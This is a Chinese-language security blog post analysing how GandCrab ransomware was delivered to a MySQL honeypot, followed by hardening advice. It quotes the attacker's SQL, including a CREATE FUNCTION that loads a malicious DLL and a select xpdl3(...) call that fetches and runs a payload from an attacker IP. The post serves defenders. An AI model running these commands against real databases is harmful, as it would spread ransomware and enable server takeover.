GandCrab勒索软件新目标:通过MySql服务器进行投放

xiannv  2006天前

近年来,勒索软件软件无论是技术层面还是伪装手段都越来越强悍,特别是在2017年的WannaCry之后,勒索软件已经成为政企单位忧心忡忡的主要网络威胁之一。


由于勒索软件一直持续演进,因此各单位需要不断关注他们的网络生态,特别是近来勒索软件开始出现了不同的勒索软件家族。


GandCrab勒索软件就是其中一个勒索软件家族样本,黑客不断对它进行开发来勒索各公司或单位的工作环境,目前已经被成为勒索软件之王。

本鸟目前已经看到了多个版本的GandCrab,最近的一个版本是GandCrab 5.2。


1.jpg

而经网上公开分析,目前已知的GandCrab系列勒索软件传播方式如下:

  1. 定向鱼叉攻击邮件投放

  2. 垃圾邮件批量投放传播

  3. 网页挂马攻击

  4. 利用CVE-2019-7238(Nexus Repository Manager 3远程代码执行漏洞)进行传播

  5. 利用weblogic漏洞进行传播

  6. RDP,VNC等途径进行爆破并入侵

  7. 利用U 盘、移动硬盘等移动介质进行传播

  8. 捆绑、隐藏在一些破解、激活、游戏工具中进行传播

  9. 感染 Web/FTP 服务器目录并进行传播

而经过安全厂商sophos的报告分析显示,目前出现了一种新的分发GandCrab勒索软件的途径:MySql数据库。

黑鸟在对原报告提及样本进行分析后,在确认无误后,对其发现攻击案例进行规整,并以此提醒各大使用MySql数据库的政企单位,切记对数据库安全进行审计,并定期修改密码,防止撞库。

正文


此次针对MySql的攻击发现于sophos公司的蜜罐系统,其监听服务器的MySQL默认端口(3306 / tcp)。

经过分析发现,攻击者在linux下运行的蜜罐系统上下载了Windows可执行文件。


攻击者首先使用SQL数据库命令将起辅助作用的DLL上传到服务器,然后将该DLL作为数据库函数进行调用,以获取一个加拿大IP地址上托管的GandCrab payload。

12.jpg
下载GandCrab的“数据库服务器”


SQL命令攻击解释


攻击的第一阶段涉及攻击者连接到数据库服务器(估计是弱口令)并确定它正在运行MySQL。由于蜜罐模拟MySQL服务,因此其余的攻击相对顺利。


2.jpg

攻击者发出的SQL命令


接下来,攻击者使用“set”命令将辅助DLL的所有字节(以长十六进制字符串的形式)加载到变量的内存中。


3.jpg

辅助DLL全部录入数据库中


然后攻击者将该变量的内容写入它创建的数据库表,名为yongger2


然后,攻击者向服务器发出命令,将这些字节构造成一个文件,然后将它们放入服务器的插件目录中。


此外,还用到了几个交换正斜杠和反斜杠字符的命令,这些命令似乎旨在使程序最终运行在安全功能下。

4.jpg

Helper DLL的内部功能


DLL似乎向数据库添加了三个函数,名为xpdl3,xpdl3_deinit和xpdl3_init, 他们均为许多恶意工具包中的组件文件,并且这些工具包先前已上载到VirusTotal并报恶意文件。

5.jpg


攻击者发出SQL命令以删除yongger2表,通过服务器删除文件的记录,发现其会删除名为xpdl3的函数(如果已存在)。

最后,它使用以下SQL命令创建一个调用DLL的新数据库函数(也称为xpdl3):

CREATE FUNCTION xpdl3 RETURNS STRING SONAME 'cna12.dll'

将辅助DLL移动至数据库服务器的插件目录并对其进行初始化后,攻击者将此SQL命令发送到服务器,并调用新添加的xpdl3函数:


select xpdl3('hxxp://172.96.14.134:5471/3306-1.exe','c:\\isetup.exe') 

6.jpg

Wireshark中显示的网络事件序列如果一切正常(在这种情况下确实如此)的话,数据库服务器从远程计算机下载GandCrab的payload会将其放在名为isetup.exe的C盘的根目录中并执行它。


这些攻击有多普遍?


对数据库服务器的攻击并不新鲜; 下面这篇文章汇总了过去攻击数据库类的分析

https://news.sophos.com/en-us/2019/04/30/a-taste-of-the-onslaught-at-the-networks-edge/


而这个特殊的攻击在5月19日星期日当地时间中午左右发生了几秒钟。

如果针对实际的MySQL服务器发生此攻击,那么该机器现在将被加密,并且该服务器的所有者将遇到一些麻烦。


打开的目录使用中文界面的HFS托管,指向运行服务器软件的Web服务器上的一个打开目录,名为HFS,它是一个基于Windows的Web服务器,采用单个应用程序的形式展示。


从点击量来看,除了蜜罐系统之外,通过类似方式中招的用户恐怕不少。

7.jpg


令人感兴趣的是,托管GandCrab示例的这台机器的IP地址在美国,并且该机器上的HFS安装的用户界面是简体中文。

另一件有趣的事情是,它显示了有人下载了此服务器上托管的任何文件的次数。


打开的目录显示了五个名称以“3306”开头的Windows可执行文件 - 文件名中带有连字符的所有文件实际上都是同一文件的重命名版本。


只有名为“3306.exe”的文件与其他文件不同。(使用3306作为文件名可能并非巧合。)该目录还包含一个名为RDP的恶意Linux ELF可执行文件,该文件未在此攻击中使用。

8.jpg
“RDP”文件是许多相关DDoS Linux木马的例子之一


Gates木马也是中国黑产常使用的木马之一,一般用于ddos,这里的样本同样也是这个用途

9.jpg

与腾讯电脑管家分析的差不多,有兴趣可查链接

https://www.freebuf.com/articles/system/117823.html

10.jpg

服务器似乎表明MySQL蜜罐下载(3306-1.exe)的样本下载超过500次。

但是,名为3306-2.exe,3306-3.exe和3306-4.exe的示例与该文件相同。

一起计算,自从他们被放置在这台服务器上之后的五天内已经有近800次下载,以及在开放目录中超过2300次下载其他(大约一周)的GandCrab样本。

11.jpg


总结


虽然这不是特别大规模的攻击,但它确实给MySQL服务器管理员带来了严重的风险,他们在防火墙上为数据库服务器的3306端口开放了端口进行映射,以便外部可以访问。


主要便在于链接仍存活,表明活动仍然在进行中,攻击者仍在扫描MySql服务器并试图分发GandCrab勒索软件并试图敛财。


因此为了保障MySql服务器安全,关闭攻击者的投放入口,因此本鸟在网上搜罗了一些措施,以供参考:

1、避免从互联网访问MySQL数据库,确保特定主机才拥有访问特权

2、定期备份数据库

3、禁用或限制远程访问

4、设置root用户的口令并改变其登录名

5、移除测试(test)数据库

6、禁用LOCAL INFILE

7、移除匿名账户和废弃的账户

8、降低系统特权

9、降低用户的数据库特权

10、移除和禁用.mysql_history文件

11、打好安全补丁

12、启用日志

13、改变root目录

14、禁用LOCAL INFILE命令

Gandcrab 5.1之前版本的解密工具

https://labs.bitdefender.com/2019/02/new-gandcrab-v5-1-decryptor-available-now/


参考链接:

https://news.sophos.com/en-us/2019/05/24/gandcrab-spreading-via-directed-attacks-against-mysql-servers/


◆来源:黑鸟

◆本文版权归原作者所有,如有侵权请联系我们及时删除

最新评论

昵称
邮箱
提交评论